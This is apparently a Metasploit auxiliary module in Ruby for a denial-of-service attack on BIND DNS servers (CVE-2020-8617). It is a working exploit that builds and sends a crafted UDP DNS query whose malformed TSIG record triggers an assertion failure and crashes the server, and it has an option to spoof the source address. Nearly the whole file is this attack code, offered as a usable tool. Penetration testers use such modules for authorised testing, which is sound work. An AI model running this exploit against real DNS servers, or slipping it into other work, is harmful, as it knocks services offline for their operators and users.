##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
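class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  # RR type of the TSIG pseudo-record (250) and the class it is sent with (ANY, 255).
  TSIG_TYPE = 250
  CLASS_ANY = 255
  # Value placed in the TSIG Error field: BADSIG (16).
  TSIG_ERROR_BADSIG = 16
  # A DNS label length is a 6-bit quantity, so 63 is the largest encodable label.
  MAX_LABEL_LEN = 63

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BIND TSIG Badtime Query Denial of Service',
        'Description' => %q{
          A logic error in code which checks TSIG validity can be used to
          trigger an assertion failure in tsig.c. The module sends one UDP
          query carrying a TSIG record whose owner name is a key the target
          is expected to have configured; it defaults to BIND's automatically
          generated local-ddns key and can be changed with TSIG_KEYNAME. No
          reply is awaited (ScannerRecvWindow is 0), so the module does not
          confirm whether the target actually crashed.
        },
        'Author' => [
          'Tobias Klein', # Research and Original PoC
          'Shuto Imai', # msf module author
        ],
        'References' => [
          ['CVE', '2020-8617'],
          ['URL', 'https://gitlab.isc.org/isc-projects/bind9/-/issues/1703'],
          ['URL', 'https://www.trapkit.de/advisories/TKADV2020-002.txt']
        ],
        'DisclosureDate' => '2020-05-19',
        'License' => MSF_LICENSE,
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']),
      # Owner name of the TSIG record. BIND creates "local-ddns" on its own;
      # override it when the target is known to use a differently named key.
      OptString.new('TSIG_KEYNAME', [true, 'Name of a TSIG key configured on the target', 'local-ddns'])
    ])

    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  # Sends one crafted query to +ip+ on RPORT, spoofing the source address when
  # SRC_ADDR is set. The packet is built before the status line is printed so
  # that an invalid TSIG_KEYNAME fails loudly rather than after a misleading
  # "Sending packet" message.
  def scan_host(ip)
    pkt = payload
    print_status("Sending packet to #{ip}")
    if datastore['SRC_ADDR']
      scanner_spoof_send(pkt, ip, rport, datastore['SRC_ADDR'])
    else
      scanner_send(pkt, ip, rport)
    end
  end

  # Builds the DNS message: a 12-byte header announcing one question and one
  # additional RR, a question for a random A record, and a TSIG pseudo-record
  # in the additional section. All pieces are assembled as a binary string so
  # the non-ASCII bytes of the TSIG fields never collide with the encoding of
  # the random text.
  #
  # @return [String] binary-encoded DNS query
  # @raise [ArgumentError] when TSIG_KEYNAME contains an empty or >63-byte label
  def payload
    query = Rex::Text.rand_text_alphanumeric(2).b # Transaction ID: 2 random bytes
    query << [
      0x0000, # Flags: standard query
      1,      # Questions: 1
      0,      # Answer RRs: 0
      0,      # Authority RRs: 0
      1       # Additional RRs: 1 (the TSIG record)
    ].pack('n*')

    # Question section: random <6 chars>.<3 chars> name, type A, class IN
    query << get_domain
    query << "\x00".b # [End of name]
    query << [1, 1].pack('nn') # Type: A (1), Class: IN (1)

    # Additional section: TSIG record owned by the key name, class ANY, TTL 0
    query << encode_name(datastore['TSIG_KEYNAME'])
    query << [TSIG_TYPE, CLASS_ANY, 0].pack('nnN')

    # RDLENGTH is computed from the RDATA actually emitted (29 bytes for the
    # default algorithm name) instead of being hard-coded.
    rdata = tsig_rdata
    query << [rdata.bytesize].pack('n')
    query << rdata
  end

  # RDATA of the TSIG record.
  #
  # The algorithm name is fixed to hmac-sha256, which is what the original
  # module sends for BIND's local-ddns key; NOTE(review): whether the crash
  # depends on this matching the configured key's algorithm is not established
  # here, so a differently configured key may need this adjusted.
  #
  # @return [String] binary RDATA
  def tsig_rdata
    rdata = encode_name('hmac-sha256') # Algorithm Name (for local-ddns: hmac-sha256)
    rdata << ("\x00" * 6).b                         # Time Signed: 48-bit, 1970-01-01 00:00:00 UTC
    rdata << [0, 0, 0, TSIG_ERROR_BADSIG, 0].pack('n*') # Fudge: 0, MAC Size: 0, Original Id: 0, Error: BadSig (16), Other len: 0
    rdata
  end

  # Encodes a dotted DNS name in wire format: each label prefixed by its
  # length, followed by the zero-length root label.
  #
  # @param name [String] dotted name, e.g. "local-ddns" or "keys.example"
  # @return [String] binary wire-format name including the terminating 0x00
  # @raise [ArgumentError] on an empty label or one longer than 63 bytes,
  #   which the one-byte length prefix cannot express
  def encode_name(name)
    wire = ''.b
    name.to_s.split('.').each do |label|
      if label.empty? || label.bytesize > MAX_LABEL_LEN
        raise ArgumentError, "invalid DNS label #{label.inspect} in #{name.inspect}"
      end

      wire << [label.bytesize].pack('C') << label.b
    end
    wire << "\x00".b
  end

  # Random two-label question name ("<6 alnum>.<3 alnum>") as length-prefixed
  # labels, WITHOUT the terminating root label — the caller appends it.
  #
  # @return [String] binary wire-format labels
  def get_domain
    first = Rex::Text.rand_text_alphanumeric(6)
    second = Rex::Text.rand_text_alphanumeric(3)
    ([6].pack('C') + first.b) << [3].pack('C') << second.b
  end
end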